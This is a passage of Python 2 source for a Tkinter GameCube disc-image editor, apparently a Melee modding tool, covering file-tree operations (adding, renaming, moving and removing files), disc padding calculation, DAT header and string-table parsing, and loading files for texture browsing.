		# If any files were added, scroll to the newly inserted item (so it's visible to the user), and update the pending changes and program status
		if firstItemAdded:
			Gui.isoFileTree.see( firstItemAdded )
			global unsavedDiscChanges
			unsavedDiscChanges.append( str( len(filepaths) - len(preexistingFiles) ) + ' file(s) added to disc.' )
			globalDiscDetails['rebuildRequired'] = True
			updateProgramStatus( 'Files Added. Awaiting Save' )
def addDirectoryOfFilesToIso():

	""" Prompts the user for a folder and recursively stages all of its files and
		subfolders as new entries in the Disc File Tree. Items whose names exceed
		29 characters are skipped and reported. Flags the disc for a rebuild. """

	if not discDetected(): return

	# Prompt for a directory to add files from.
	directoryPath = tkFileDialog.askdirectory(
		title='Choose a folder of files to add to the disc image.',
		initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
		#parent=Gui.root,
		mustexist=True )

	if directoryPath:
		parent, index, isoPath = determineNewEntryPlacement()

		if parent == globalDiscDetails['gameId'].lower() + '/sys':
			msg( 'Directories or files cannot be added to the system files folder.' )
			return

		# Make sure a folder by this name doesn't already exist
		initialDirIid = parent + '/' + os.path.basename( directoryPath ).lower()
		if Gui.isoFileTree.exists( initialDirIid ): # Once this is established, further iids attached to this will always be unique, so no further checks are required.
			msg( 'A directory by this path and name already exists in the disc.' )
			return

		rootDir = os.path.dirname( directoryPath )
		firstItemAdded = ''
		foldersAdded = 0
		filesAdded = 0
		filenamesTooLong = []

		# Recursively scan the given folder and subfolders, and add all directories and files to the file tree
		for parentDir, listOfFolders, listOfFiles in os.walk( directoryPath ):
			# Normalize characters not allowed in disc paths
			modifiedParentDir = parentDir.replace( '-', '_' ).replace( ' ', '_' )
			modifiedDirName = os.path.basename( modifiedParentDir )

			# Exclude folders with names that are too long (>=30 characters)
			if len( modifiedDirName ) >= 30:
				filenamesTooLong.append( parentDir )
				continue

			# Build this folder's disc path from its location relative to the chosen root
			relHeirarchy = os.path.relpath( parentDir, start=rootDir ).replace( '\\', '/' )
			thisFolderIsoPath = parent + '/' + relHeirarchy.replace( ' ', '_' ).replace( '-', '_' )
			thisFolderParent = '/'.join( thisFolderIsoPath.split('/')[:-1] ).lower() # removes the last directory from the path
			folderIid = thisFolderIsoPath.lower()

			# Attempt to grab the folder icon image.
			Gui.isoFileTree.insert( thisFolderParent, index, iid=folderIid, text=' ' + modifiedDirName, values=('Adding to disc...', 'folder', 'native', '', thisFolderIsoPath, 'iso', ''), image=Gui.imageBank('folderIcon'), tags='changed' )
			if firstItemAdded == '': firstItemAdded = folderIid
			foldersAdded += 1

			# Add the files for this folder
			for fileName in listOfFiles:
				modifiedfileName = fileName.replace( '-', '_' ).replace(' ', '_')

				# Exclude files with names that are too long (>=30 characters)
				if len( os.path.splitext(fileName)[0] ) >= 30:
					filenamesTooLong.append( parentDir + '/' + fileName )
					continue

				filePath = parentDir + '/' + fileName
				fileSize = os.path.getsize( filePath )
				isoPath = thisFolderIsoPath + '/' + modifiedfileName
				Gui.isoFileTree.insert( folderIid, 'end', iid=isoPath.lower(), text=' ' + modifiedfileName, values=('Adding to disc...', 'file', '0', fileSize, isoPath, 'path', filePath), tags='changed' )
				filesAdded += 1

			if index != 0: index = 0 # This may only be non-zero for the very first root folder that is being added

		# Notify the user of any skipped items
		if filenamesTooLong: msg( 'These files were skipped, because their file names are longer than 29 characters:\n\n' + '\n'.join(filenamesTooLong) )

		# NOTE(review): firstItemAdded may still be '' if the root folder name was too long — confirm .see('') is harmless
		Gui.isoFileTree.see( firstItemAdded ) # Scrolls to the newly inserted items, so it's visible to the user.

		global unsavedDiscChanges
		unsavedDiscChanges.append( str(foldersAdded) + ' folders and ' + str(filesAdded) + ' files added to disc, from ' + rootDir + '.')
		globalDiscDetails['rebuildRequired'] = True
		updateProgramStatus( 'Items Added. Awaiting Save' )
def createDirectoryInIso():

	""" Prompts the user for a directory name (absolute or relative disc path) and
		stages a new, empty folder in the Disc File Tree at the location given by
		the current selection. Validates the name for length and illegal characters,
		then flags the disc for a rebuild. """

	if not discDetected(): return

	# Determine the location (parent and index) for the directory in the treeview. Also need the isoPath, which is the item's case-preserved path
	targetIid = Gui.isoFileTree.selection()

	if targetIid:
		targetIid = targetIid[-1] # Simply selects the lowest position item selected
		_, entity, _, _, isoPath, _, _ = Gui.isoFileTree.item( targetIid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data

		if entity == 'folder':
			parent = targetIid
			index = 0
		else:
			isoPath = '/'.join( isoPath.split('/')[:-1] ) # removes the filename portion of the path
			parent = isoPath.lower()
			index = Gui.isoFileTree.index( targetIid )

		if parent == globalDiscDetails['gameId'].lower() + '/sys':
			msg( 'Directories or files cannot be added to the system files folder.' )
			return
	else:
		# Nothing selected; default to the disc root
		isoPath = globalDiscDetails['gameId']
		parent = isoPath.lower()
		index = 'end'

	if not Gui.isoFileTree.exists( parent ):
		msg( 'Unable to determine a target location for the new directory. Please first choose an existing item as a reference point.' )
		return

	# Prompt the user to enter a name for the directory; validate it, and parse it for a full path, if given
	nameChecksOut = False
	while not nameChecksOut:
		newIsoPath = isoPath
		iid = ''
		popupWindow = PopupEntryWindow( Gui.root, message='Enter a name for the directory:\n(Both absolute and relative paths are acceptable.)', width=50 )
		dirName = popupWindow.entryText.replace( '"', '' )
		if dirName == '': break # Prompt was canceled

		# If the directory appears to be a full path, re-determine the parent directory
		if '\\' in dirName: msg( 'Please only use forward slashes ("/") when supplying an absolute path.' )
		else:
			for char in [ '-', '\\', ':', '*', '?', '<', '>', '|', ' ', '\n', '\t' ]:
				if char in dirName:
					msg( 'Spaces, line breaks, and the following characters may not be included in the path name: \t - \\ : * ? < > |' )
					break
			else: # if the above loop didn't break (meaning an invalid character wasn't found)
				if '/' in dirName:
					# A path was given; split off the new directory name and locate its parent
					pathParts = dirName.split( '/' )
					newIsoPath = '/'.join( pathParts[:-1] ) # removes the last portion (the new directory name) from the path
					parent = newIsoPath.lower()
					dirName = pathParts[-1]
					if not Gui.isoFileTree.exists( parent ):
						msg( 'Unable to locate the parent folder. please double-check that the path is correct.' )
						continue
				if len( dirName ) >= 30:
					msg( 'Directory names must be less than 30 characters in length.' )
					continue
				newIsoPath += '/' + dirName
				iid = newIsoPath.lower()
				if Gui.isoFileTree.exists( iid ): msg( 'This directory already exists. Please enter a different name.' )
				else: nameChecksOut = True

	if iid and dirName:
		Gui.isoFileTree.insert( parent, index, iid=iid, text=' ' + dirName, values=('Adding to disc...', 'folder', 'native', '', newIsoPath, 'iso', ''), image=Gui.imageBank('folderIcon'), tags='changed' )
		Gui.isoFileTree.see( iid ) # Scrolls to the newly inserted item, so it's visible to the user.

		global unsavedDiscChanges
		unsavedDiscChanges.append( 'Folder, "' + dirName + '", added to disc.')
		globalDiscDetails['rebuildRequired'] = True
		updateProgramStatus( 'Folder Added. Awaiting Save' )
def renameItem():

	""" Renames the file or folder currently selected in the Disc File Tree, after
		validating the new name (length and illegal characters), then regenerates
		the FST (game.toc) to reflect the change. System files cannot be renamed. """

	if not discDetected(): return
	iidSelectionsTuple = Gui.isoFileTree.selection()

	if not iidSelectionsTuple: msg( 'Please select an item to rename.' )
	elif len( iidSelectionsTuple ) > 1: msg( 'Please only select one item to rename.' )
	else:
		originalIid = iidSelectionsTuple[0]
		description, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( originalIid, 'values' )
		originalName = isoPath.split('/')[-1]
		parent = Gui.isoFileTree.parent( originalIid )
		index = Gui.isoFileTree.index( originalIid )

		# Make sure this isn't a system file/folder
		systemFileFolder = globalDiscDetails['gameId'].lower() + '/sys'
		if originalIid == systemFileFolder or Gui.isoFileTree.parent( originalIid ) == systemFileFolder:
			msg( 'System files and the system files folder cannot be renamed.' )
			return

		# Prompt the user to enter a new name, and validate it
		nameChecksOut = False
		while not nameChecksOut:
			newIid = ''
			popupWindow = PopupEntryWindow( Gui.root, message='Enter a new name:', defaultText=originalName, width=30 )
			newName = popupWindow.entryText.replace( '"', '' )
			if newName == '': break # Prompt was canceled

			# Validate the name's length. '>= 30' matches the name-length limit enforced
			# elsewhere in the program (names must be 29 characters or less); this was
			# previously '> 30', which incorrectly allowed 30-character names.
			if len( newName ) >= 30: msg( 'Please specify a name less than 30 characters in length.' )
			else:
				for char in [ '-', '/', '\\', ':', '*', '?', '<', '>', '|', ' ', '\n', '\t' ]:
					if char in newName:
						msg( 'Spaces, line breaks, and the following characters may not be included in the name: \t - / \\ : * ? < > |' )
						break
				else: # if the above loop didn't break (meaning an invalid character wasn't found)
					newIsoPath = '/'.join( isoPath.split('/')[:-1] ) + '/' + newName
					newIid = newIsoPath.lower()
					if Gui.isoFileTree.exists( newIid ): msg( 'This item already exists. Please enter a different name.' )
					else: nameChecksOut = True

		if newName:
			# Treeview iids can't be changed in-place, so replace the item entirely
			# NOTE(review): if a folder is renamed, its children keep their old isoPath values — confirm this is handled elsewhere
			Gui.isoFileTree.delete( originalIid )
			Gui.isoFileTree.insert( parent, index, iid=newIid, text=' ' + newName, values=(description, entity, isoOffset, fileSize, newIsoPath, source, data), tags='changed' )
			Gui.isoFileTree.selection_set( newIid )
			Gui.isoFileTree.focus( newIid )

			# Create a new FST and write it into the disc
			fstIid = globalDiscDetails['gameId'].lower() + '/game.toc'
			description, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( fstIid, 'values' )
			Gui.isoFileTree.item( fstIid, values=('Modified with a renamed entry', entity, isoOffset, fileSize, isoPath, 'ram', generateFST()), tags='changed' ) # Just changing the last two values

			global unsavedDiscChanges
			unsavedDiscChanges.append( originalName + ' renamed to ' + newName + '.' )
			updateProgramStatus( 'Item Renamed. Awaiting Save' )
def getTotalItems( parentIid='' ):

	""" Recursively tallies the files and folders under (and including) the given
		Disc File Tree item. Returns a tuple of ( fileCount, folderCount ). """

	entity = Gui.isoFileTree.item( parentIid, 'values' )[1]

	# Base case: a file counts as one file, zero folders
	if entity == 'file':
		return 1, 0

	# Otherwise this is a folder; count it, then tally everything beneath it
	fileCount = 0
	folderCount = 1
	for childIid in Gui.isoFileTree.get_children( parentIid ):
		childFiles, childFolders = getTotalItems( childIid )
		fileCount += childFiles
		folderCount += childFolders

	return fileCount, folderCount
def removeItemsFromIso():

	""" Removes the currently selected files/folders from the Disc File Tree,
		tallies how many of each were removed for the pending-changes log, and
		flags the disc as requiring a rebuild. """

	if not discDetected(): return

	# Remove the selected items from the file tree
	totalFilesRemoved = 0
	totalFoldersRemoved = 0
	iidSelectionsTuple = Gui.isoFileTree.selection()

	if iidSelectionsTuple:
		for iid in iidSelectionsTuple:
			# Count the items about to be removed, and then remove them from the file tree
			if Gui.isoFileTree.exists( iid ): # This double-check is in case selections overlap (e.g. a folder and items within it were selected)
				filesRemoved, foldersRemoved = getTotalItems( iid )
				totalFilesRemoved += filesRemoved
				totalFoldersRemoved += foldersRemoved
			if Gui.isoFileTree.exists( iid ): Gui.isoFileTree.delete( iid ) # May not exist if it was in a folder that has already been deleted

		global unsavedDiscChanges
		unsavedDiscChanges.append( str(totalFilesRemoved) + ' files and ' + str(totalFoldersRemoved) + ' folders removed.' )
		globalDiscDetails['rebuildRequired'] = True
		updateProgramStatus( 'Items Removed. Awaiting Save' )
def moveSelectedToDirectory():

	""" Moves the items currently selected in the Disc File Tree into a directory
		chosen by the user from a dropdown of folders native to the disc, then
		flags the disc for a rebuild. System files cannot be moved. """

	if not discDetected(): return
	iidSelectionsTuple = Gui.isoFileTree.selection()

	# 'not x' covers an empty tuple as well as an empty string (the previous
	# "== ''" test never matched the empty tuple returned by ttk's selection()),
	# and matches the empty-selection checks used elsewhere in this file.
	if not iidSelectionsTuple:
		msg( 'There are no items selected.' )
		return

	# Make sure the system folder and/or files within it are not selected.
	systemFileFolder = globalDiscDetails['gameId'].lower() + '/sys'
	for item in iidSelectionsTuple:
		if item == systemFileFolder or Gui.isoFileTree.parent( item ) == systemFileFolder:
			msg( 'System files and the system files folder cannot be modified.' )
			return

	# Get a list of folders currently in the disc (so the user can select a destination folder)
	directoriesDict = {} # Maps isoPath -> treeview iid
	def browseFolders( folderIid='' ):
		for item in Gui.isoFileTree.get_children( folderIid ):
			_, entity, isoOffset, _, isoPath, _, _ = Gui.isoFileTree.item( item, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
			if entity == 'folder' and isoOffset == 'native': # This is a folder that was originally in the disc's filesystem
				directoriesDict[ isoPath ] = item
				browseFolders( item ) # Recurse into subfolders
	browseFolders() # starts with the root

	# Cancel if there are no valid directories to move to.
	if directoriesDict == {}:
		msg( 'There are no folders native to the disc to move these to.' )
		return

	# Present the user with a dropdown menu to choose a directory to move the selected items to
	dropDownMessage = 'Choose a directory to move these items to:\n(Only folders native to the disc will appear here.)'
	dropdownWindow = popupDropdownWindow( Gui.root, message=dropDownMessage, title='Move Item(s)', dropdownOptions=directoriesDict.keys() )

	if dropdownWindow.dropDownValue.get(): # The dropDownValue will be an empty string if the window was canceled.
		targetDirIid = directoriesDict[ dropdownWindow.dropDownValue.get() ]

		# Move the selected items to the chosen folder
		totalFilesMoved = 0
		totalFoldersMoved = 0
		for item in iidSelectionsTuple:
			if Gui.isoFileTree.exists( item ): # This double-check is in case selections overlap (e.g. a folder and items within it were selected)
				filesRemoved, foldersRemoved = getTotalItems( item )
				totalFilesMoved += filesRemoved
				totalFoldersMoved += foldersRemoved
				Gui.isoFileTree.move( item, targetDirIid, 'end' )
				Gui.isoFileTree.item( item, tags='changed' )
				Gui.isoFileTree.item( targetDirIid, tags='changed' )

		global unsavedDiscChanges
		unsavedDiscChanges.append( str(totalFilesMoved) + ' files and ' + str(totalFoldersMoved) + ' folders moved to ' + dropdownWindow.dropDownValue.get() + '.' )
		globalDiscDetails['rebuildRequired'] = True
		updateProgramStatus( 'Items Moved. Awaiting Save' )
def getInterFilePaddingLength( totalNonSystemFiles=0, totalFileSpace=0 ): # totalFileSpace is totaled from both system and main disc files, plus alignment adjustments

	""" Determines how much padding to place between files when building a disc,
		based on the 'paddingBetweenFiles' setting. 'auto' evenly distributes the
		space left in a standard-size GameCube disc between the files (plus one
		extra padding region at the end); otherwise the setting is parsed as a
		decimal or hex byte count. The result is always a multiple of 4 bytes. """

	paddingSettingsValue = settings.get( 'General Settings', 'paddingBetweenFiles' ).lower()

	if paddingSettingsValue == 'auto':
		standardGameCubeDiscSize = 1459978240 # In bytes
		spaceToFill = standardGameCubeDiscSize - totalFileSpace
		if spaceToFill < 0: interFilePaddingLength = 0
		else: interFilePaddingLength = spaceToFill / ( totalNonSystemFiles + 1 ) # The +1 allows for one more region of padding at the end of the disc.
	else:
		# Parse the setting as a literal byte count (hex if prefixed with '0x')
		try:
			if '0x' in paddingSettingsValue: interFilePaddingLength = int( paddingSettingsValue, 16 )
			else: interFilePaddingLength = int( paddingSettingsValue )
		except: interFilePaddingLength = int( generalSettingsDefaults['paddingBetweenFiles'], 16 ) # Unparsable setting; fall back to the default

	# Undercut (reduce) the padding length, if necessary, to guarantee it is aligned to 4 bytes
	interFilePaddingLength -= interFilePaddingLength - int( 4 * math.floor(float(interFilePaddingLength) / 4) )

	return interFilePaddingLength
def getCssIid():

	""" Finds the Disc File Tree iid for the Character Select Screen file (MnSlChr)
		in the loaded disc. Returns an empty string if the disc isn't detected as
		Melee, or if the file can't be found. """

	cssIid = ''

	if not globalDiscDetails['isMelee']:
		print '\t\tCannot get CSS iid; disc detected as not Melee.'
	else:
		cssIid = scanDiscForFile( 'MnSlChr.u' ) # May be .usd (English) or .ukd (in PAL)
		if not cssIid: cssIid = scanDiscForFile( 'MnSlChr.0' ) # For 20XXHP v4.07/07+/07++
		if not cssIid: print '\t\tMnSlChr file not found.'

	return cssIid
#================================#
# ~ ~ Primary DAT Operations ~ ~ #
#================================#
def parseDatHeader( fileData ): # depricated. only the function below this is still using it

	""" Reads basic stats from the DAT's header. Input should be a bytes or bytearray
		object, and may be the entire file data or just the header (first 0x20 bytes).
		Returns a dict of the raw header fields plus two derived offsets
		(rtEnd and stringTableStart). """

	if not isinstance( fileData, (bytearray, bytes) ):
		raise IOError( 'Invalid input to parseDatHeader! Should be a bytearray or bytes.' )

	# Raw header fields
	rtStart = toInt( fileData[4:8] ) # Size of the data block
	rtEntryCount = toInt( fileData[8:12] )
	rootNodeCount = toInt( fileData[12:16] )
	referenceNodeCount = toInt( fileData[16:20] )

	# Derived offsets (relocation table end, and the start of the string table beyond the node tables)
	rtEnd = rtStart + ( rtEntryCount * 4 )
	stringTableStart = rtEnd + ( rootNodeCount * 8 ) + ( referenceNodeCount * 8 )

	return {
		'filesize': toInt( fileData[:4] ),
		'rtStart': rtStart,
		'rtEntryCount': rtEntryCount,
		'rootNodeCount': rootNodeCount,
		'referenceNodeCount': referenceNodeCount,
		'rtEnd': rtEnd,
		'stringTableStart': stringTableStart,
	}
def parseStringTable( localDatData, sortNodes=True ): # depricated. only one function still using this

	""" Parses a DAT file's root/reference node tables and string table.
		Returns ( rootNodes, referenceNodes, stringDict ), where the node lists are
		lists of ( filePointer, string ) tuples and stringDict maps string-table
		offsets to strings. Any parsing failure returns empty results instead. """

	try:
		if not isinstance( localDatData, bytearray ) and not isinstance( localDatData, bytes ):
			raise IOError( 'Invalid input to parseStringTable! Should be a bytearray or bytes.' )

		headerInfo = parseDatHeader( localDatData )

		# Slice out the combined root/reference node tables (0x20 accounts for the file header)
		rootAndRefNodesTable = localDatData[0x20 + headerInfo['rtEnd']:0x20 + headerInfo['stringTableStart']]
		nodesTable = [ rootAndRefNodesTable[i:i+8] for i in xrange(0, len(rootAndRefNodesTable), 8) ] # list comprehension; separates the data into groups of 8 bytes
		stringTable = localDatData[0x20 + headerInfo['stringTableStart']:]

		# Build a dict mapping each string's offset within the string table to the string itself
		stringDict = {}
		offset = 0
		strings = stringTable.split(b'\x00')[:len(nodesTable)] # Final splicing eliminates an empty string and/or extra additions at the end of the file.
		for stringBytes in strings:
			string = stringBytes.decode( 'ascii' ) # Convert from a bytearray to a string
			stringDict[offset] = string
			offset += len( string ) + 1 # +1 to account for null terminator

		rootNodes = []; referenceNodes = [] # Both of these will be a list of tuples of the form ( filePointer, string )
		for i, entry in enumerate( nodesTable ):
			filePointer = toInt( entry[:4] ) # First 4 bytes of the node entry
			stringOffset = toInt( entry[4:] ) # Last 4 bytes of the node entry
			string = stringDict[ stringOffset ]
			# The first rootNodeCount entries are root nodes; the rest are reference nodes
			if i < headerInfo['rootNodeCount']: rootNodes.append( ( filePointer, string ) )
			else: referenceNodes.append( ( filePointer, string ) )

		if sortNodes:
			rootNodes.sort()
			referenceNodes.sort()

		return rootNodes, referenceNodes, stringDict

	# Deliberate catch-all: a malformed file yields empty results rather than an error
	except:
		return [], [], {}
def updatePrevNextFileButtons( currentFile, forStandaloneFile=False ):

	""" Updates the Next/Previous DAT buttons on the DAT Texture Tree tab. Sets their target file to load,
		their tooltip/pop-up text, and the mouse cursor to appear when hovering over it. 'currentFile' will
		be a full/absolute file path if this is for a standalone file, (one not in a disc)
		otherwise it will be an iid for the file in the Disc File Tree tab. """

	if forStandaloneFile:
		# Get a list of all DAT and/or USD files (plus whatever current file type is loaded) in the current directory.
		currentDirectory, filename = os.path.split( currentFile )
		currentExtension = filename.split('.')[-1]
		filenamesList = [ f for f in os.listdir(currentDirectory) if os.path.isfile(os.path.join(currentDirectory, f)) ] # Builds a list of files; excludes folders
		filteredFilenamesList = [ fn for fn in filenamesList if any([ fn.lower().endswith(ext) for ext in [currentExtension, '.dat', '.usd'] ]) ] # Removes files of other types.

		# Iterate the files list to find the currently loaded file
		for i, filename in enumerate( filteredFilenamesList ):
			if os.path.join( currentDirectory, filename ) == currentFile:

				# Check whether there is a previous entry.
				if i != 0:
					prevFile = filteredFilenamesList[i-1]
					Gui.previousDatText.set( prevFile )
					# Bind the previous-file path as a lambda default so it's captured now, not at click time
					Gui.previousDatButton.bind( '<1>',
						lambda event, prevPath=os.path.normpath( os.path.join(currentDirectory, prevFile) ): loadPreviousOrNextDat(prevPath) )
					Gui.previousDatButton.config( cursor='hand2' )
				else:
					Gui.previousDatText.set( 'No more!' )
					Gui.previousDatButton.unbind( '<1>' )
					Gui.previousDatButton.config( cursor='' )

				# Check whether there is a next entry.
				if i != len(filteredFilenamesList) - 1:
					nextFile = filteredFilenamesList[i+1]
					Gui.nextDatText.set( nextFile )
					Gui.nextDatButton.bind( '<1>',
						lambda event, nextPath=os.path.normpath( os.path.join(currentDirectory, nextFile) ): loadPreviousOrNextDat(nextPath) )
					Gui.nextDatButton.config( cursor='hand2' )
				else:
					Gui.nextDatText.set( 'No more!' )
					Gui.nextDatButton.unbind( '<1>' )
					Gui.nextDatButton.config( cursor='' )
				break

	else: # The current file is from a disc. 'currentFile' is an iid string.
		# Update the prev. file button
		prevItem = Gui.isoFileTree.prev( currentFile )
		while prevItem != '' and Gui.isoFileTree.item( prevItem, 'values' )[1] != 'file':
			prevItem = Gui.isoFileTree.prev( prevItem ) # Skips over any folders.
		if prevItem != '':
			Gui.previousDatText.set( prevItem )
			Gui.previousDatButton.bind( '<1>', lambda event, item=prevItem: loadPreviousOrNextDat(item) )
			Gui.previousDatButton.config( cursor='hand2' )
		else:
			Gui.previousDatText.set( 'No more!' )
			Gui.previousDatButton.unbind('<1>')
			Gui.previousDatButton.config( cursor='' )

		# Update the next file button
		nextItem = Gui.isoFileTree.next( currentFile )
		while nextItem != '' and Gui.isoFileTree.item( nextItem, 'values' )[1] != 'file':
			nextItem = Gui.isoFileTree.next( nextItem ) # Skips over any folders.
		if nextItem != '':
			Gui.nextDatText.set( nextItem )
			Gui.nextDatButton.bind( '<1>', lambda event, item=nextItem: loadPreviousOrNextDat(item) )
			Gui.nextDatButton.config( cursor='hand2' )
		else:
			Gui.nextDatText.set( 'No more!' )
			Gui.nextDatButton.unbind('<1>')
			Gui.nextDatButton.config( cursor='' )
def loadPreviousOrNextDat( newFileToLoad ):
	""" Loads the next/previous file from a disc or within a folder. Used by the Previous / Next DAT buttons on the DAT Texture Tree tab.
		'newFileToLoad' is an iid from the Gui.isoFileTree treeview widget. """
	# Disc-resident files route through the disc loader, which performs its own unsaved-changes checks
	if Gui.datTextureTree.lastLoaded.source == 'disc':
		loadFileWithinDisc( newFileToLoad, changeTab=False )
		return
	# Standalone file; make sure there aren't any changes the user wants to save before loading in a new file
	if newFileToLoad.lower().endswith( '.bnr' ):
		if globalBannerFile and not globalBannerFile.noChangesToBeSaved( programClosing ):
			return
		restoreEditedEntries( editedBannerEntries )
	else:
		if globalDatFile and not globalDatFile.noChangesToBeSaved( programClosing ):
			return
		restoreEditedEntries( editedDatEntries )
	loadStandaloneFile( newFileToLoad, changeTab=False )
def browseTexturesFromDisc():
	""" Wrapper for the 'Browse Textures' button in the GUI (or file tree double-click) and option in the dropdown menus. """
	if not discDetected(): return
	# Exactly one file must be selected in the ISO File Tree for this to proceed
	selectedIids = Gui.isoFileTree.selection()
	selectionCount = len( selectedIids )
	if selectionCount == 0:
		msg( 'Please select a file to browse in.' )
	elif selectionCount == 1:
		loadFileWithinDisc( selectedIids[0] )
	else:
		msg( 'Please only select one file to browse in.' )
def analyzeFileFromDisc():
	""" Wrapper for the 'Analyze Structure' button in the GUI (or file tree double-click) and option in the dropdown menus. """
	if not discDetected(): return
	# Exactly one file must be selected in the ISO File Tree for this to proceed
	selectedIids = Gui.isoFileTree.selection()
	selectionCount = len( selectedIids )
	if selectionCount == 0:
		msg( 'Please select a file to analyze.' )
	elif selectionCount == 1:
		loadFileWithinDisc( selectedIids[0], toAnalyze=True )
	else:
		msg( 'Please only select one file to analyze.' )
def loadFileWithinDisc( iid, toAnalyze=False, changeTab=True ):
	""" Prepares a file in a disc for reading in the DAT Texture Tree tab. Called by the 'Browse Images' button,
		the dropdown menus, and the loadPrevious/NextDat buttons.
			iid: 		item id from the Gui.isoFileTree treeview identifying the file within the disc
			toAnalyze: 	if True, the file is destined for the Structural Analysis tab instead of the textures tab
			changeTab: 	if True, switch GUI tabs and let the tab-change event handler start the scan/analysis """
	# The treeview item's values include the entity kind ('file'/'folder') and the file's path within the ISO
	_, entity, _, _, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' )
	if entity != 'file':
		msg( 'Please only select a file (not a folder) to browse in for textures.' )
		return
	# Set the selected item in the ISO File Tree, so that it's clear which file is being viewed in DAT Texture Tree.
	Gui.isoFileTree.selection_set( iid )
	Gui.isoFileTree.focus( iid )
	Gui.isoFileTree.see( iid ) # Scrolls to the given item to make sure it's visible in the tree
	# Ensure the disc can still be located
	if not discDetected(): return
	updatePrevNextFileButtons( iid )
	global globalBannerFile, globalDatFile
	fileExt = isoPath.split( '.' )[-1].lower()
	# Ask the user if they'd like to save any unsaved changes before forgetting the current file
	if fileExt == 'bnr': # Banner file; displayed on the Disc Details tab rather than the DAT tabs
		# Make sure there aren't any changes the user wants saved
		if globalBannerFile and not globalBannerFile.noChangesToBeSaved( programClosing ): return
		globalBannerFile = hsdFiles.datFileObj( source='disc' ) # Close enough match that that container will work well
		if not globalBannerFile.load( iid, fileData=getFileDataFromDiscTreeAsBytes( iid=iid ), fileName=os.path.basename(isoPath) ):
			updateProgramStatus( 'Banner File Could Not Be Loaded' )
			msg( 'The disc that this file resided in, or the exernal file that this referenced, can no longer be found (it may have been moved/renamed/deleted).' )
		else:
			restoreEditedEntries( editedBannerEntries )
			Gui.datTextureTree.lastLoaded = globalBannerFile
			Gui.mainTabFrame.select( Gui.discDetailsTab )
			reloadBanner()
			updateProgramStatus( 'File Scan Complete' )
	else:
		# Make sure there aren't any changes the user wants saved
		if globalDatFile and not globalDatFile.noChangesToBeSaved( programClosing ): return
		globalDatFile = hsdFiles.datFileObj( source='disc' )
		if not globalDatFile.load( iid, fileData=getFileDataFromDiscTreeAsBytes( iid=iid ), fileName=os.path.basename(isoPath) ):
			updateProgramStatus( 'DAT File Could Not Be Loaded' )
			msg( 'The disc that this file resided in, or the exernal file that this referenced, can no longer be found (it may have been moved/renamed/deleted).' )
		else:
			restoreEditedEntries( editedDatEntries )
			Gui.datDestination.set( isoPath )
			Gui.datTextureTree.lastLoaded = globalDatFile
			clearDatTab()
			clearStructuralAnalysisTab()
			# Disable the tab switch feature if it is desired but we're already on the right tab (the handler won't activate)
			currentTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
			if toAnalyze and currentTab == Gui.savTab: changeTab = False
			elif not toAnalyze and currentTab == Gui.datTab: changeTab = False
			if changeTab:
				# Switch tabs, and let the event handler bound to tab switching handle calling of the scan/analyze function.
				if toAnalyze:
					Gui.mainTabFrame.select( Gui.savTab )
				else:
					Gui.mainTabFrame.select( Gui.datTab )
			elif currentTab == Gui.savTab:
				analyzeDatStructure()
			else:
				scanDat()
def loadStandaloneFile( filepath, toAnalyze=False, changeTab=True ):
	""" This function updates the Next/Previous DAT buttons on the DAT Texture Tree tab,
		it then loads the appropriate next/previous banner or DAT file and scans it.
			filepath: 	path to a standalone (non-disc) file on the host filesystem
			toAnalyze: 	if True, the file is destined for the Structural Analysis tab
			changeTab: 	if True, switch GUI tabs and let the tab-change event handler start the scan """
	#todo perhaps move checks on whether the user wants to save unsaved changes to this function
	updatePrevNextFileButtons( filepath, forStandaloneFile=True )
	# Check if this is a banner file or a DAT
	if filepath.split( '.' )[-1].lower() == 'bnr':
		if changeTab:
			Gui.mainTabFrame.select( Gui.discDetailsTab )
		global globalBannerFile
		globalBannerFile = hsdFiles.datFileObj()
		globalBannerFile.load( filepath )
		Gui.isoDestination.set( filepath )
		Gui.datTextureTree.lastLoaded = globalBannerFile
		updateBannerFileInfo()
		updateProgramStatus( 'File Scan Complete' )
	else:
		global globalDatFile
		globalDatFile = hsdFiles.datFileObj()
		globalDatFile.load( filepath )
		Gui.datDestination.set( filepath )
		Gui.datTextureTree.lastLoaded = globalDatFile
		clearDatTab()
		clearStructuralAnalysisTab()
		# Disable the tab switch feature if it is desired but we're already on the right tab (the handler won't activate in this case)
		currentTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
		if changeTab:
			if toAnalyze and currentTab == Gui.savTab: changeTab = False
			elif not toAnalyze and currentTab == Gui.datTab: changeTab = False
		if changeTab:
			# Switch tabs, and let the event handler bound to tab switching handle calling of the scan/analyze function.
			if toAnalyze:
				Gui.mainTabFrame.select( Gui.savTab )
			else:
				Gui.mainTabFrame.select( Gui.datTab )
		elif currentTab == Gui.savTab:
			analyzeDatStructure()
		else:
			scanDat()
def clearDatTab( restoreBackground=False ):
	""" Resets the DAT Texture Tree tab to an empty state: clears the texture treeview and
		the display canvas, resets the file-info labels, disables the secondary tool panes,
		and empties the image caches.
			restoreBackground: if True, re-places the drag-n-drop background image
							   (used when no file remains loaded). """
	# Remove any existing entries in the treeview.
	for item in Gui.datTextureTree.get_children(): Gui.datTextureTree.delete( item )
	# Reset the size of the texture display canvas, and clear its contents (besides the grid)
	Gui.textureDisplay.configure( width=Gui.textureDisplay.defaultDimensions, height=Gui.textureDisplay.defaultDimensions )
	Gui.textureDisplay.delete( Gui.textureDisplay.find_withtag('border') )
	Gui.textureDisplay.delete( Gui.textureDisplay.find_withtag('texture') )
	# Add or remove the background drag-n-drop image
	if restoreBackground:
		Gui.datTextureTreeBg.place( relx=0.5, rely=0.5, anchor='center' )
	else: # This function removes them by default
		Gui.datTextureTreeBg.place_forget()
		Gui.datTextureTreeFiltersMsg.place_forget()
	# Reset the values on the Image tab.
	Gui.datFilesizeText.set( 'File Size: ' )
	Gui.totalTextureSpaceText.set( 'Total Texture Size: ' )
	Gui.texturesFoundText.set( 'Textures Found: ' )
	Gui.texturesFilteredText.set( 'Filtered Out: ' )
	# Disable some tabs by default (within the DAT Texture Tree tab), and if viewing one of them, switch to the Image tab
	if Gui.root.nametowidget( Gui.imageManipTabs.select() ) != Gui.textureTreeImagePane:
